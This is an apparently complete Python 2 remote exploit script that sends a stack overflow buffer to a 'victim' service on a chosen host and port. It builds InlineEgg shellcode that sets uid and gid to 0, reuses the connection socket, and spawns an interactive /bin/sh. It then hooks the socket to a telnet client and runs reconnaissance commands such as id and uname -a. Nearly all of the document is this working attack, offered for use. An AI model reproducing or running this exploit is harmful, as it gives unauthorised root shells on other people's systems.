#!/usr/bin/python

from inlineegg import *
from buildbuffer import *
import socket
import struct
import sys
import os
import telnetlib
import getopt
import exceptions

RET_ADDR= 0xBFFFF5D2L - 64
BUFFER_SIZE =	1260
ALLOWED_IP =	"127.0.0.1" 
ALLOWED_IP =	"*" 
     
def fprintf(str):
    sys.stderr.write(str)
    sys.stderr.flush()

def line():
    fprintf("-" * 80 + "\n" )
 
def dump(buffer):
    addr = 0
    fprintf("0x%04x " % addr)
    for c in buffer:
	fprintf("0x%02x " % (ord(c)))
	addr = addr + 1
	if (addr%16 == 0 ):
	    fprintf("\n0x%04x " % addr)
    fprintf("\n")

 
def reuseSocketEgg():
  
    if ALLOWED_IP != '*': 
	ip  = int(struct.unpack('L',socket.inet_aton(ALLOWED_IP))[0])
	do_ip_check = True 
    else:
	do_ip_check = False
	
    egg = InlineEgg(Linuxx86Syscall)
    egg.setuid(0)
    egg.setgid(0)
    
    # Get more space on the stack
    egg.alloc(1024)
    # Space for socket fd
    sock = egg.save(-1)
    # Do {} While() Loop to found correct IP Address
    foundIP = egg.Do()
    # Do {} While Loop to find correct soscket fd 
    loop = egg.Do()
    # inc socket fd
    loop.addCode(loop.micro.inc(sock))
    # Make space to address buffer
    buff = loop.alloc(16)
    lenp = loop.save(16)
    # Lookup peer
    err  = loop.getpeername(sock, buff.addr(), lenp.addr())
    loop.addCode(loop.micro.set('edx',buff+4)) 
    # Is valid soscket ?
    loop.While(err, '!=', 0)
    # Is allowed ip address ? 
    if do_ip_check:
	foundIP.While('edx','!=', ip)
    
    # Duplicate socket into stdin,stdout and stderr
    egg.dup2(sock, 0)
    egg.dup2(sock, 1)
    egg.dup2(sock, 2)
    # Replace current process with shell, connected to the socket
    egg.execve('/bin/sh',('sh','-i'))
    return egg
 

def parse_opts():
    cmds = 'h:p:am:o:'
    cmdl =  ['host=','port=','asm','mode=','offset=']
    host = "127.0.0.1"
    port = 9999
    mode = "NONE"
    offset = 0
    
    try:
        opts, args = getopt.getopt(sys.argv[1:],cmds ,cmdl)
        for o, a in opts:
            if o in ('-h',"--host"):
                host = a 
            if o in ('-p',"--port"):
                port = int(p)
            if o in ('-a',"--asm"):
		egg = reuseSocketEgg()
		print egg.getCode()
		sys.exit(0)
	    if o in ('-m',"--mode"):
                mode = a.upper() 
            if o in ('-o',"--offset"):
                offset = int(a)
            
    except exceptions.SystemExit:
        et, ev, tb = sys.exc_info()
        sys.exit(0)
    except:
        pass
    return host,port,mode,offset 


def main():
    
    host,port,mode,offset = parse_opts()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, int(port)))
    
    # Generate Egg 
    egg = reuseSocketEgg()
    
    # Get Buffer Builder
    bf = BuildBufferFactory(mode,egg,BUFFER_SIZE,RET_ADDR,offset)
   
    # First send the bytes to read, to the victm
    buffer = "%i\n" % ( BUFFER_SIZE + 4)
    buffer += bf.build()
    
    line()  
    dump(buffer)
    line()
    fprintf("Egg Len     : %d \n" % len(egg)) 
    fprintf("Encoder     : %s \n" % bf.name())
    fprintf("Hook Len    : %d \n" % bf.len_hook())
    fprintf("Buffer Len  : %d \n" % bf.len())
    fprintf("Ret Addr    : 0x%x\n" % RET_ADDR)
    fprintf("Target Host : %s:%s\n" % (host, port))
    fprintf("Allowed IP  : %s\n" % ( ALLOWED_IP ))
    line()
    
    # Send Buffer to victim 
    sock.send(buffer)
    
    # Connect shell sosket to local telnet client
    t = telnetlib.Telnet()
    t.sock = sock
    fprintf("Starting Telnet Client on Socket:  %d \n" % sock.fileno())
    line()
    
    # Get some info of the remote shell
    t.write("uname -a\n")
    t.write("id\n")
    t.write("who\n");
    t.interact()
    

main()

